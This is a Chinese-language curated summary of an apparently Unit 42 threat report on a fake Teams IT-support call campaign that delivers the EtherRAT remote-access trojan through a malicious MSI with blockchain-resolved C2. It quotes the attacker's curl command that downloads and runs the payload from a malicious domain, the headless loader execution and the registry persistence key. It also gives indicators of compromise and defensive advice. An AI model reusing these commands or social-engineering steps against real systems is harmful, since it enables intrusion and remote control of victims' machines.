假冒 Teams IT 支持来电借恶意 MSI 与区块链锚定 C2 投递 EtherRAT
📖 本页为 ztpop.net 对权威原始来源的「策展索引」——仅整理呈现原始出处与原文要点,一切以原文为准。原文:Fake IT-support scam abuses Teams call to deliver EtherRAT via malicious MSI and blockchain anchored C2(Unit 42 (Palo Alto Networks),2026-06-28)。
概述
Unit 42(Palo Alto Networks 威胁情报团队)研究员 Brian Janower 于 2026 年 6 月 28 日发布时效威胁情报,披露一场将钓鱼邮件与假冒 Microsoft Teams IT 支持通话结合的社工攻击链:攻击者冒充「System Administrator」发起跨租户 Teams 通话,诱导受害者交出屏幕远程控制权、安装合法 RMM(远程管理)工具以建立持久化,再通过恶意 MSI 加载器部署区块链锚定 C2 的 Node.js 远控木马 EtherRAT。研究人员在分发服务器上发现该木马的 v1–v9 共九个版本,最近一次更新为 2026 年 6 月 26 日,表明该行动仍在活跃演进。
攻击链:从钓鱼邮件到 Teams 远程控制
- 初始接触(钓鱼邮件):以伪造的「Employee Survey(员工调查)」HTML 邮件诱饵,附件为 PDF(如「EE Survey - How to log on.pdf」),在 Adobe Acrobat Reader 中打开。
- Teams 假冒 IT 支持来电:受害者随后接到来自外部账户的 Microsoft Teams 通话,对方自称「System Administrator」。会话标题中带有
External unfamiliar(外部/不熟识)标记,表明联系方来自组织外部、无可信关系。 - 攻击者身份:通话账户为
helpdesk@Progressive936.onmicrosoft[.]com,显示名「System Administrator」,攻击者租户 ID 为310e9ead-4f6f-491e-aafe-feb08c8d17a4;Teams 审计日志确认其从攻击者控制的跨租户账户发起一对一聊天(HasForeignTenantUsers: true)。 - 远程控制取证痕迹:受害者会话中出现工件
CtrlVirtualCursorWin_000001E8A159B970,这是 Teams 屏幕控制功能在控制器接管鼠标时生成的虚拟光标文件,证明攻击者在会话期间实际远程操控了受害者机器。 - 诱导安装 RMM 工具:在远程控制下,攻击者引导受害者在 Edge 浏览器中下载并安装 HopToDesk 与 AnyDesk,借此建立持久远程访问通道。
- 下载恶意 MSI:攻击者通过命令提示符执行
cmd /c curl -Lo ...\v7.msi hxxps[:]//camorreado[.]click/v7.msi下载并执行恶意安装包。 - 借 IT 工单掩护:控制机器期间,攻击者还访问了受害企业的 ServiceNow 门户并新建支持工单(如「My Request - INC0491...」),以内部 IT 服务的合法外衣掩盖活动。
MSI 加载器与执行链
样本 v7.msi 是一个以 JavaScript 编写、面向 Windows 的 Windows Installer 文件,向本地应用数据目录投放三个文件:批处理脚本 R2YxSP2m.cmd、混淆的 JavaScript 加载器 z0SYYdWk9g.dat、加密二进制块 eXYlcnebRLrWyBc.ini。安装过程中的 CustomAction 执行 conhost --headless cmd /c "R2YxSP2m.cmd":
- 批处理脚本拉取合法 Node.js v18.20.5 运行时(来自 nodejs[.]org),解压并重命名目录为
1DIZ0D,以conhost --headless方式用 node.exe 执行加载器。 - JavaScript 加载器用 24 字节减法密钥
94ea2ff910a28771f74c2759132ce77d0eb231e3aa1900e1解密内嵌的十六进制数据,产出第二阶段加载器。 - 第二阶段加载器再以多步密码链解密
eXYlcnebRLrWyBc.ini,最终落地 EtherRAT 载荷。
载荷与 C2:区块链锚定的远控木马
EtherRAT 是一个跨平台(Windows / Linux / macOS)的 Node.js RAT,其命令与控制地址不再硬编码,而是从以太坊智能合约解析,使防御方难以通过封禁 IP 或域名阻断:
- 主 C2 解析合约:
0x6e044e19000487c4a6e6af15b4132a5561b5ee1f - 备用(托管)解析合约:
0x788a5336c0ef70be87619a3c13a43050c426f7ec - 硬编码回退 C2 域名:
necropatia[.]com - 持久化:通过注册表 Run 键
Software\Microsoft\Windows\CurrentVersion\Run\OneDriveSetup实现。
攻击者基础设施
研究人员在分发域 camorreado[.]click 上发现一个开放目录,托管 EtherRAT 的 v1 至 v9 版本,最后更新于 2026 年 6 月 26 日,印证该行动处于持续开发状态。
入侵指标(IoC)
| 类型 | 指标 | 用途 / 说明 |
|---|---|---|
| 攻击者账户 | helpdesk@Progressive936.onmicrosoft[.]com(显示名「System Administrator」) | 跨租户 Teams 假冒 IT 支持 |
| 攻击者发件域 | Progressive936.onmicrosoft[.]com | 钓鱼邮件 / Teams 来电来源 |
| 攻击者租户 ID | 310e9ead-4f6f-491e-aafe-feb08c8d17a4 | 外部租户标识 |
| 域名 | camorreado[.]click | 恶意 MSI 分发 / EtherRAT v1–v9 开放目录 |
| 域名 | necropatia[.]com | 硬编码回退 C2 |
| URL | hxxps[:]//camorreado[.]click/v7.msi | 恶意 MSI 下载地址 |
| URL | hxxps[:]//necropatia[.]com | 回退 C2 |
| 文件哈希 (SHA-256) | fc2907fa866f86e0821f75060a331ce69ee10ff3aa374587993b17ba5406fa33 | v7.msi |
| 文件哈希 (SHA-256) | c2eeb74892408496f5a307a5b1fdc92d94fd014ab4252868f04046bf84718ab6 | stage2_payload1.cmd |
| 文件哈希 (SHA-256) | 94cb54d53927e4ba469099760db531be563a84d716df69e864062d90f0f2448d | stage2_payload2.js |
| 文件哈希 (SHA-256) | 0cb2f7651d50e1ed1a691e82f0297d49444bdded2461e136cffb156d4f234e52 | stage2_payload3.dat |
| 文件哈希 (SHA-256) | c16784e2c7b3e3b798addd718850da18f8eb532ab8f352c769a4470d7124805d | stage4_payload1.js |
| 文件哈希 (SHA-256) | d46b4e8d188fe1773c44d38d730dcb6287639568240c765d9ad4ad79cd239e82 | stage3_payload1.js |
| 以太坊合约 | 0x6e044e19000487c4a6e6af15b4132a5561b5ee1f | 主 C2 解析合约 |
| 以太坊合约 | 0x788a5336c0ef70be87619a3c13a43050c426f7ec | 备用 C2 解析合约 |
| 解析出的 C2 URL | hxxps[:]//seconds.australiaeast.cloudapp.azure[.]com | 由以太坊合约交易解析 |
| 解析出的 C2 URL | hxxps[:]//resurce.swedencentral.cloudapp.azure[.]com | 由以太坊合约交易解析 |
| 解析出的 C2 URL | hxxps[:]//cover.wedencentral.cloudapp.azure[.]com | 由以太坊合约交易解析 |
| 解析出的 C2 URL | hxxps[:]//dns1.southafricanorth.cloudapp.azure[.]com | 由以太坊合约交易解析 |
检测与缓解建议
- 收敛 Teams 外部通信面:在 Teams 外部访问策略中默认阻断或强制审批来自外部租户的一对一聊天/通话;对出现
External unfamiliar标记的通话保持高警觉。 - 监控远程控制取证工件:将
CtrlVirtualCursorWin_*类文件的出现纳入端点检测规则,作为「攻击者曾实际接管屏幕」的强信号。 - 管控 RMM 工具安装:对 HopToDesk / AnyDesk 等远程管理软件的安装进行应用审批与告警;对命令行中出现
curl下载.msi到临时目录的行为设防。 - 异常 Node.js 运行时下载:告警从 nodejs[.]org 拉取并改名为随机目录的 Node.js 运行时,以及
conhost --headless执行 node 加载脚本的行为。 - 凭证与邮件侧防御:对钓鱼邮件启用 DMARC 强制(p=reject)与高级威胁防护;结合条件访问与防钓鱼 MFA,降低初始访问成功率。
- 区块链 C2 的应对:由于 C2 地址在链上可变,除封禁已知域名/IP 外,应将重点放在行为检测(异常出站、可疑进程树)与 EDR 狩猎上。
本页为对 Unit 42 原始时效威胁情报的策展索引,技术细节与完整狩猎查询请以原文为准。
参考来源
了解更多行业资讯,请访问 行业资讯首页 或致电 021-69753778 获取安全咨询服务。
相关文章
- 微软深度拆解 Tycoon2FA:一个支撑规模化 AiTM 钓鱼的头部 PhaaS 工具包
- Proofpoint:俄 APT 借 Zimbra 零日零点击钓鱼,窃取邮件与 2FA 令牌
- Unit 42 2026 事件响应报告如何描述勒索软件与邮件初始访问的关系?
—— ztpop.net 策展(译自 Unit 42 (Palo Alto Networks) 原始发布,内容以原文为准)
